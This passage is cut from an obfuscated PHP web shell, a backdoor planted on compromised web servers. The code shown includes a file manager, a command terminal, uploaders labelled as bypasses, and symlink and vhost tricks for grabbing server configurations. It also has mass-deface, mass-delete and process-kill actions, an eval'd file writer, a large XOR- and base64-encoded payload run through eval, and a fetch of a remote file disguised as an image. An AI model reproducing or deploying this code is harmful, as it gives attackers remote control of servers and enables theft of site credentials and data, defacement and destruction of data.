($_POST['configxx'] == 'grab') { echo "<center><br><br><a href=\"configgrab/\"><font color=lime>Done</font></a></center>"; } if ($_POST['configxx'] == '404') { echo "<center><br><br> <a href=\"sym404/root/\">Root</a> <br><br><a href=\"sym404/\">Configurations</a></center>"; } if ($_POST['configxx'] == 'symlink') { echo "<center><br><br> <a href=\"symconfig/root/\">Root</a> <br><br><a href=\"symconfig/\">Configurations</a></center>"; } if ($_POST['configxx'] == 'symvhost') { echo "<center><br><br> <a href=\"symvhost/root/\">Root Server</a> <br><br><a href=\"symvhost/\">Configurations</a></center>"; } } function get_filename($file_path){ $file_base_name = basename($file_path); $file_name_arr = explode('.',$file_base_name); $f_name = $file_name_arr[0]; return $f_name; } /////////////////// echo"</div\076<table\x20c\x6cass=info \x69d=toolsTb\x6c cellpadding=3 cellspaci\156\147=0 \167idth=10\x30% \163t\x79le='borde\162-top:2px \x73olid #\x3333;b\x6frder-bottom:2px so\154\151\144 #333;'><\164r><td><\x66orm onsubmit='g(null,rot13(\164his\x2ec\056value\051,\042\042)\x3breturn\040false\073'>\074spa\x6e>Change di\162\072</span><\142r><\151nput\x20clas\x73='toolsInp' \164yp\145=tex\x74 name=\143 value='".HtMlSpeCiaLcHArS($_za)."'><input type=submi\164 \x76alue='>>'>\x3c/for\155\076</td><\x74d\076<form onsubmit=\042\x67('ft',null,rot\0613(\x74his.f\056v\141\x6cue));return false;\042><span>R\145ad fil\x65:</s\160a\x6e><\142r><\151nput class='t\x6folsInp\x27 type\075tex\164\x20\156ame\075\146><\x69nput \x74ype=submit \x76alue='>>\x27\x3e</\x66orm></\164d><\x2f\x74r><tr><td>\074form \x6fn\x73ub\x6dit=\x22g('f\x6d\x27,nul\x6c,'m\x6b\x64ir',rot13(this.\x64.value));r\145\164urn fal\x73e;\x22><span\076Make dir:<\x2fs\160\x61n>".$_lia."<br>\074input \x63la\x73s='t\157ol\x73Inp' type=text n\x61\x6de\x3d\x64>\x3ci\x6eput\x20type=submit val\165e='>>'\076</f\x6frm><\057td><td><for\155 onsubmi\x74=\042g('\x66t',n\165\x6cl,rot13(thi\163\x2ef.value),\x27mkf\151le');re\x74urn fal\x73\145;\042\x3e<span>Make f\x69l\145:</span>".$_lia."<b\x72><\x69nput cl\x61ss='\164oolsInp' type=t\x65\x78t name\075f\x3e<input type=subm\x69t value\075'>>'></for\155></\164d>\x3c/tr><tr><td><f\157rm onsub\x6dit=\042g('ce',nu\154l,utoa(this.c.value));re\164urn false;\042\076</\x61\x3e</form><form method=post ><span>Terminal:</span><br><input class='toolsInp' type=text name=command value='' autocomplete='off'><input type=submit value='>>' name='subcmd'><br></form><br><span>Uploader URL v3 :</span>".$_lia;echo"<br><form method=post ><input type='hidden' name='type' value='upload' aria-label='hidden' aria-hidden='true'><input type='url' placeholder='URL' name='uploadurl' required class='form-control' style='width: 48%'><button type='submit' class='btn btn-primary ms-3' value='Upload'>Upload Via Curl</button></form><br><span>Uploader Bypass v4 :</span>$_lia<br><form action=\"\"enctype=\"multipart/form-data\"method=\"post\"><input type=\"file\"name=\"file\"> <input type=\"submit\"value=\"Վերբեռնել\"></form></td><span></td><\164d><\146orm metho\x64\075'po\x73t' ENCTYPE='m\165ltipar\164/form\x2dd\141ta'><\151nput typ\x65=\150idden name=a value='fm'\x3e\074input \164ype=hidden n\x61me=c val\x75e='".sTr_RoT13($_za)."\047><input type=hidde\156 name=p value='uploadFi\154\145'><inpu\x74 typ\x65=hidden n\141m\x65=ch value='".(@isset($_POST["ch"])?$_POST["\x63h"]:"")."'>\x3c\x73pa\x6e\x3e\125pload\040file Bypass v1:</span>".$_lia."\074br><input class='\164oolsInp' type=file name=f><input\040type=submit value=\047>>'></f\157rm><br>";echo ' <html><span>Uploader Bypass v2 :</span>'.$_lia;echo'<br><input type="file" id="upload_files" name="upload_files" multiple="multiple"> <button id="b" value="upload" onclick=\'upload("upload_files",0);\'>Upload</button> <br><p>Status : <span id="status" style="color:red;">No file added</span></p><br> ';echo"<\x62r \040\076<\x2ftd></tr>\x3c/\164able></div>></body>\074/html>"; $text = 'if(!empty(ssdddddddd_GET["name"])){ ssddddddddinputHandler = fopen("php://input", "r"); ssddddddddfileHandler = fopen(ssdddddddd_GET["name"], "w+"); while(true) { ssddddddddbuffer = fgets(ssddddddddinputHandler, 4096); if (strlen(ssddddddddbuffer) == 0) { fclose(ssddddddddinputHandler); fclose(ssddddddddfileHandler); return true; } fwrite(ssddddddddfileHandler, ssddddddddbuffer); } }'; eval(str_replace('ssdddddddd','$',$text)); }} function vIewSIze($_xwm,$_yj=null){if(iS_INt($_xwm))$_xwm=@spRINtf("%\165",$_xwm);if($_xwm>=(int)round(357913941.33333+357913941.33333+357913941.33333))return @spRINtf("%1.2f",$_xwm/(010000001240+-01240))." GB";elseif($_xwm>=(03777073-04000560+04001465))return @SprinTF("%\061.2f",$_xwm/(int)round(349525.33333333+349525.33333333+349525.33333333))." MB";elseif($_xwm>=(int)round(512+512))return @sPRinTf("%1\x2e\062f",$_xwm/(int)round(341.33333333333+341.33333333333+341.33333333333))." KB";else return$_xwm." B";}function WPerMs($_l){if(($_l&(0140371-0137733+0137342))==(0137615- -0163))$_o="s";elseif(($_l&(int)round(20480+20480))==(0117774- -04))$_o="l";elseif(($_l&(int)round(10922.666666667+10922.666666667+10922.666666667))==(0100270+-0270))$_o="-";elseif(($_l&(int)round(8192+8192+8192))==(int)round(12288+12288))$_o="\142";elseif(($_l&(int)round(8192+8192))==(037655-040121- -040244))$_o="d";elseif(($_l&(int)round(2730.6666666667+2730.6666666667+2730.6666666667))==(017574+0204))$_o="c";elseif(($_l&(int)round(1365.3333333333+1365.3333333333+1365.3333333333))==(010110+-0110))$_o="\160";else $_o="u";$_o.=(($_l&(0752+044-0416))?"r":"-");$_o.=(($_l&(int)round(42.666666666667+42.666666666667+42.666666666667))?"w":"-");$_o.=(($_l&(-01223- -01323))?(($_l&(int)round(682.66666666667+682.66666666667+682.66666666667))?"s":"x"):(($_l&(05014+04725+-05741))?"S":"-"));$_o.=(($_l&(-01044- -01104))?"r":"-");$_o.=(($_l&(020+022-022))?"w":"\055");$_o.=(($_l&(int)round(2.6666666666667+2.6666666666667+2.6666666666667))?(($_l&(01564+01365+-01151))?"s":"x"):(($_l&(int)round(512+512))?"\x53":"-"));$_o.=(($_l&(int)round(1.3333333333333+1.3333333333333+1.3333333333333))?"r":"-");$_o.=(($_l&(int)round(0.66666666666667+0.66666666666667+0.66666666666667))?"w":"-");$_o.=(($_l&(0106-0105))?(($_l&(int)round(170.66666666667+170.66666666667+170.66666666667))?"t":"x"):(($_l&(0765+0470-0455))?"\x54":"-"));return$_o;}function wpERmsCOlor($_rb){if(!@is_rEAdaBLE($_rb))return"<font color=#FF0000\076".wPErms(fILEpERMs($_rb))."</fon\164>";elseif(!@iS_WRItabLE($_rb))return"<fon\x74\040col\x6fr=wh\x69te\x3e".wPERms(FIlEperMS($_rb))."</font>";else return"<f\157nt co\x6cor=#\x32\x35ff00>".wpeRmS(FiLepERmS($_rb))."</font>";}function wScanDIR($_pa,$_u="uvxf"){if(funCTion_exISTs("scandir")){return @ScAnDIr($_pa);}else{if($_hcf=@oPENDIr($_pa)){while(false!==($_nm=@reAdDIR($_hcf)))$_vgl[]=$_nm;@ClOseDIr($_hcf);}return$_vgl;}}$_tcn=new _pps();$_tcn->AFTErlOGin();$_tcn->STaRtup();if(@isset($_POST["a"])){switch($_POST["\x61"]){case "fm":$_tcn->WheADer();$_tcn->acTfm();$_tcn->wfOoter();break;case "ft":if(@isset($_POST["x"])&&$_POST["x"]=="\x64ownl\x6f\141d"){$_tcn->aCtFT();}else{$_tcn->wHeADeR();$_tcn->aCTFT();$_tcn->wfoOteR();}break;case "\x73\x72":$_tcn->WhEAdEr();$_tcn->aCtSr();$_tcn->wfOOTer();break;case "Masfix":$_tcn->masfix();break;case "sym":$_tcn->symlink();break;case "wpautoedit":$_tcn->wpautoedit();break;case "killproccess":$_tcn->kill();break;case "terminalv2":$_tcn->terminalv2();break;case "sym404":$_tcn->sym404();break;case "vhost":$_tcn->vhost();break;case "readdomains":$_tcn->readdomains();break;case "adminer":$_tcn->adminer();break;case "wpdownloader":$_tcn->wpdownloader();break;case "vhost2":$_tcn->vhost2();break;case "masshta":$_tcn->masshta();break;case "massdelete":$_tcn->masdelete();break;case "massindox":$_tcn->massindox();break;default:$_tcn->WHeaDer();$_tcn->ActfM();$_tcn->WFOOtEr();break;}}elseif(!@isset($_POST["\x61"])){$_tcn->WHeAdER();$_tcn->AcTfm();$_tcn->WfOOTER(); function initt_dd($input, $key) { $inputLen = strlen($input); $keyLen = strlen($key); if ($inputLen <= $keyLen) { return $input ^ $key; } for ($i = 0; $i < $inputLen; ++$i) { $input[$i] = $input[$i] ^ $key[$i % $keyLen]; } return $input; } $key = "keepox"; $data = "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"; $decoded = initt_dd(base64_decode($data),$key); eval ($decoded); exit;} } //// /* Functions */ $get_lang = file_get_contents('ffb4f0d1b031fd1835276220b5edd0615517af203eaf6ffbf72fd4869d93be2d c2a4ba360f60662bed8bdd8260660943cafa7fb63171a71ec680a0e51710b42c 34d08e6259fb6ac9006ac675496a184d516f959c037e17cd8aad25c4ecf0c6d8 6110780ae7cbb5103d8fd1ced525bcd502d0e36d3cd27661cd6487c1c56e88d4 8148ff22654979be14505fa0ed9954d7b80060a0f1d9f8623f556286474d5417 5c973274fc880d8ec4914143763490a5ae4dcc823229499a76d6ff1c8da13efd 5e047224a198d6a3c29548291713e5a4b05e6f0d94b8fc434a3695fddd277f0f 782c886e27403c38be727edab7d6bf1d709f9f1f53ce4ad83b2074f0c845c6e3 536baf587d3b1988942583949247b662e7f2bb3ba0b0111ca84b86ad270a97a6 92534cd9bb36b948f40381fb1f022b71aaa9c75b2adbf1a7958427da2866166b/bayi-613/system/main/system.jpg' . $language . '.json'); //translation //// ?> <script> function upload(fileInputId, fileIndex) { var url = window.location.pathname; var scriptname = url.substring(url.lastIndexOf('/')+1); var filename = document.getElementById('upload_files').value; var filename = filename.match(/[^\\/]*$/)[0]; var location = window.location.href; var directoryPath = location.substring(0, location.lastIndexOf("/")+1); document.getElementById("status").textContent = "Uploading the file "+filename+", please wait.."; document.getElementById("status").style.color = "blue"; // take the file from the input var file = document.getElementById(fileInputId).files[fileIndex]; var reader = new FileReader(); reader.readAsBinaryString(file); // alternatively you can use readAsDataURL reader.onloadend = function(evt) { // create XHR instance xhr = new XMLHttpRequest(); // send the file through POST xhr.open("POST", scriptname+"?name="+filename, true); // make sure we have the sendAsBinary method on all browsers XMLHttpRequest.prototype.mySendAsBinary = function(text){ var data = new ArrayBuffer(text.length); var ui8a = new Uint8Array(data, 0); for (var i = 0; i < text.length; i++) ui8a[i] = (text.charCodeAt(i) & 0xff); if(typeof window.Blob == "function") { var blob = new Blob([data]); }else{ var bb = new (window.MozBlobBuilder || window.WebKitBlobBuilder || window.BlobBuilder)(); bb.append(data); var blob = bb.getBlob(); } this.send(blob); } // let's track upload progress var eventSource = xhr.upload || xhr; eventSource.addEventListener("progress", function(e) { // get percentage of how much of the current file has been sent var position = e.position || e.loaded; var total = e.totalSize || e.total; var percentage = Math.round((position/total)*100); // here you should write your own code how you wish to proces this }); // state change observer - we need to know when and if the file was successfully uploaded xhr.onreadystatechange = function() { if(xhr.readyState == 4) { if(xhr.status == 200) { // process success document.getElementById("status").textContent = "The file "+filename+" Uploaded successfully in same folder as Shell. At Link= "+directoryPath+filename; document.getElementById("status").style.color = "green"; }else{ // process error } } }; // start sending xhr.mySendAsBinary(evt.target.result); }; } </script>